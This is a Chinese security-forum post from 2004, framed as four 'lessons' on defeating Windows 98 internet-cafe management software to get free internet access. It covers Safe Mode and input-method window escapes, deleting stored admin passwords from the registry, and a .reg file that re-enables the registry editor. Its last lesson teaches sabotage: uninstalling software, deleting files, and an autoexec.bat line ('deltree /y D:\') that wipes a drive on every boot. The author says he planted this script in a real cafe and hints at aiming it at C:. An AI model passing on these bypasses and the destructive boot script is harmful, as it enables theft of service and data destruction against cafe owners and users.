论坛: 网吧专题 标题: 网吧WIN98系统破解 复制本贴地址    
作者: yaoyihua [yaoyihua]    论坛用户   登录


网吧里一般都安装了管理软件,但是漏洞很多。本篇用四节课来讲解网吧的常见漏洞以及如何利用这些漏洞……(适用于WINDOWS 98操作系统)。
今天我们主要从“输入法”和“安全模式”这两个常见漏洞入手。
(开始上第一课,那位仁兄醒醒!)首先试试“安全模式”漏洞。到网吧后开机(不要管理员解锁),一会儿屏幕出现“Starting Windows ……”时,按下"F5"键启动到“安全模式”,在"开始"→"运行"框中输入"msconfig"(回车),打开“系统配置实用程序”,用鼠标单击"启动"标签,去掉所有与网管软件有关的项,也可以在运行框中输入“regedit”打开注册表,删除注册表"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"下的相关键值,更残忍的干脆把网管软件给卸载掉,重新启动计算机后,就可以免费上网了,是不是很简单,不过可要当心网吧老板。如果“F5”键被屏蔽了,则应该先修改“msdos.sys”,看看下面的“输入法”漏洞,大家就知道怎么修改了(……有点困了!休息一会儿,下节课再教大家了)。
(各位口渴了先喝口茶吧!)要上第二课了(本课以‘网吧管理专家’为例),照样先开机(启动过程别按‘F5’)没有让管理员解锁的计算机在桌面上有一密码框,是用于验证用户身份的,这里分为会员和管理员,两种身份分别具有不同的使用权限,我不是管理员,因为我不知道管理员密码,在座有哪位知道的?(你不用拼命摇头啦!)没有密码照样能进入,我们可以绕到密码框后面去。用鼠标单击“会员卡号”框,利用“ctrl+shift”或“Ctrl+Space(空格键)”调出输入法,然后随意输入一个字母,在弹出的输入框上单击鼠标右键,看看有没有“帮助”,没有的话就用“Ctrl+Shift”切换输入法,直到找出“帮助”后单击它,鼠标的移动范围被限制了,可以这样破解它:按下“Alt+Space”,在弹出的标题栏菜单上(用键盘)选择“移动”,再回车两下就OK了(这种破解方法是我误打误撞才摸索到的,曾经只是想利用键盘把“扫雷”游戏移到桌面中央,好让鼠标指针能“够得着”它,没想到鼠标竟能移动自如了!)。基础打好了,现在让我们看看这个网吧里有什么好东东,用鼠标单击“帮助”的标题栏图标(有一种帮助没有这个图标,这种帮助好像没什么利用价值),打开控制菜单后,再单击“跳至 URL(J) ...”,在弹出的输入框中输入网址或盘符都可以,先去C盘看看,输入“C:”或“file:///c:/”,我找……似乎没什么好玩的,你看那网管软件,就放在这么显眼的地方,也不怕被人执行“Uninstall.exe”。(那边有人嚷嚷:“说了这么多,怎么还不上网呢?”)……各位先别急着扔臭鸡蛋、烂蔬菜,下面就开始上网了:),去"新浪"逛逛,打开“跳至 URL(J)…”框,输入“www.sina.com.cn”(“回车”),大家让一让,发生什么事了???网页内容竟然在“帮助”里显示出来了!如果要去雅虎网站,还得再单击“跳至 URL(J) ...”,麻烦了点,不如去桌面上找个IE更方便些,这次还是得单击“跳至 URL(J)...”,输入“c:\windows\desktop”(回车),或者在刚才打开的c盘上任意选择一个文件夹,按“shift+Enter(回车)”,调出资源管理器,也可以到达桌面。
有些人想要管理员密码,你可以自已来设置一个,我惯用的方法是:打开注册表,删除“[Hkey_Local_Machine\Software\万象幻境\专家系列管理软件]”下的键名“计算机解锁密码”和“运行设置程序密码”的键值(另外还有其他的密码,均已被编译,要删除就随你便啦!)改完后退出注册表并重新启动计算机,密码框不见了,然后依次单击“开始→设置→运行设置程序”,倘若你觉得该网吧限制太高,不烦把它设置低一点。如果注册表编辑器被禁止,就当我上面的话没说,我们可以用这种方法破解:
㈠. 在IE地址栏内输入“c:”,回车。   
㈡.单击“文件”菜单,新建一份文本文档,输入如下代码:

Regedit4

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:01000000


将文件另存为"1.reg",把它双击安装后就可以使用注册表编辑器了。刚才提到怎样解除“F5”的限制,利用“帮助”漏洞来解除可以,但是我想利用“快速提示”漏洞。
接着上第三课(累了去休息一会儿吧!)这节课教大家什么?嗯!是“输入法”中的“快速提示”漏洞,目前仅有“五笔加加”输入法有这个漏洞。照上节课教的,不过这次要大家找的是“快速提示”,而不是“帮助”,切换输入法,找到“快速提示”后单击它,这时出现一个IE窗口(不是太菜的你应该知道干什么用的,上网用的呗!),鼠标移动范围被限制了,破解它(上节课教过了,但是如果IE窗口是最大化的,则应该先在控制菜单中选择“恢复为小窗口”后再“移动”,再按“回车”),这样便可免费上网了,需要打开桌面,最简单的方法是:在IE地址栏上输入“桌面”(回车)。回顾一下第一节课主要说了什么……嗯!利用“F5”漏洞免费上网,大多被屏蔽掉了,第二节课说过要利用“快速提示”漏洞来解除它。怎么做呢?(大家笔拿起来做些笔记),"msdos.sys"文件在C盘根目录下一般是以“隐藏”和“只读”形式储存的,我们需要先去掉它的“只读”属性,要不然无法对它做任何修改,在IE地址栏上输入"file:///C:/command.com"回车,打开"ms-dos方式",在提示符下输入 "attrib -r  c:\msdos.sys"(回车)以去掉“只读”属性,再返回到IE地址栏上输入"file:///C:/msdos.sys"(回车),把“打开方式”设为“记事本”,把"option"下的"BootKeys"的值改为“1”,保存退出。重新启动计算机便可使修改生效。
上面讲的都是以“网吧管理专家”网管软件为例,如果是“美萍”控制的计算机,得先打开“开始→会员登陆’”,接下来与“网吧管理专家”操作过程相同。再补充一点,其实免费上网还有一种方法,不过成功率不高,就是使网管软件出错,我是用键盘上的“Ctrl、Shift、Alt”三个键中任一键或任两键配合其他键狂按,结果网管软件报错退出,“我的电脑”和“回收站”等都出现在桌面上了。
第四节课说一些破坏网吧数据的方法(那位耳朵伸得那么长,想必是网德不善者)。
破坏1(破坏级别:中):在IE“地址栏”或“jump to URL”中输入“file:///c:/windows/control.exe”,打开“控制面板→  添加/删除程序”,卸载掉你“感兴趣”的应用程序。
破坏2(破坏级别:中→高)为了防止文件被删除,网管软件一般都屏蔽了鼠标右键,并且连键盘上的“Delete”和“Shift+Delete”也无效,不过据我所知,在“网吧管理专家”控制下的数据可以用“Ctrl+D”来删除。
破坏3(破坏级别:高):修改C盘根目录下的“autoexec.bat”文件为如下代码:

@echo off
path=c:\windows;c:\windows\command
smartdrv >nul
deltree /y D:\.  >nul

这些代码是我前段时间在某网吧里预留的,后果只是使硬盘D分区的数据全部丢失而已,但计算机仍可启动(因为操作系统被装在C盘),若将第四段代码的“D:”改为“C:”,有什么后果?你试试就知道了,像我这样心地善良,乐于助人的人,是不会那么做的。



【发表评论】【推荐】【大 中 小】【打印】【关闭】

精彩评论:

【发表评论】【推荐】【大 中 小】【打印】【关闭】



相关资源:



 












地主 发表时间: 04-07-31 02:59

回复: pyion [pyion]   论坛用户   登录
先Ding再说

B1层 发表时间: 04-07-31 10:45

论坛: 网吧专题

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号